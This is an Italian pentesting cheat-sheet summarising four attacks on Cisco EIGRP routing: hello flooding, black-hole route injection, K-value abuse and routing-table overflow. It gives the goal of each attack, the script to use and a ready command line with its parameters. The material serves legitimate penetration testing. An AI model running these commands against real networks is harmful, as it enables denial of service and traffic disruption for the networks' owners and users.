EIGRP Attacks
Questa è una sintesi degli attacchi esposti in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Consultalo per ulteriori informazioni.
Attacco Falsi Vicini EIGRP
Obiettivo: Sovraccaricare le CPU dei router inondandole con pacchetti di hello EIGRP, potenzialmente portando a un attacco di Denial of Service (DoS).
Strumento: Script helloflooding.py.
Esecuzione: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Parametri:
--interface
: Specifica l'interfaccia di rete, ad esempio,eth0
.--as
: Definisce il numero di sistema autonomo EIGRP, ad esempio,1
.--subnet
: Imposta la posizione del subnet, ad esempio,10.10.100.0/24
.
Attacco Buco Nero EIGRP
Obiettivo: Interrompere il flusso del traffico di rete iniettando una rotta falsa, creando un buco nero dove il traffico viene indirizzato verso una destinazione inesistente.
Strumento: Script routeinject.py.
Esecuzione: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Parametri:
--interface
: Specifica l'interfaccia del sistema dell'attaccante.--as
: Definisce il numero AS EIGRP.--src
: Imposta l'indirizzo IP dell'attaccante.--dst
: Imposta l'IP del subnet di destinazione.--prefix
: Definisce la maschera dell'IP del subnet di destinazione.
Attacco Abuso dei Valori K
Obiettivo: Creare interruzioni continue e riconnessioni all'interno del dominio EIGRP iniettando valori K alterati, risultando efficacemente in un attacco DoS.
Strumento: Script relationshipnightmare.py.
Esecuzione: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Parametri:
--interface
: Specifica l'interfaccia di rete.--as
: Definisce il numero AS EIGRP.--src
: Imposta l'indirizzo IP di un router legittimo.
Attacco Overflow della Tabella di Routing
Obiettivo: Sforzare la CPU e la RAM del router inondando la tabella di routing con numerose rotte false.
Strumento: Script routingtableoverflow.py.
Esecuzione: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Parametri:
--interface
: Specifica l'interfaccia di rete.--as
: Definisce il numero AS EIGRP.--src
: Imposta l'indirizzo IP dell'attaccante.
Last updated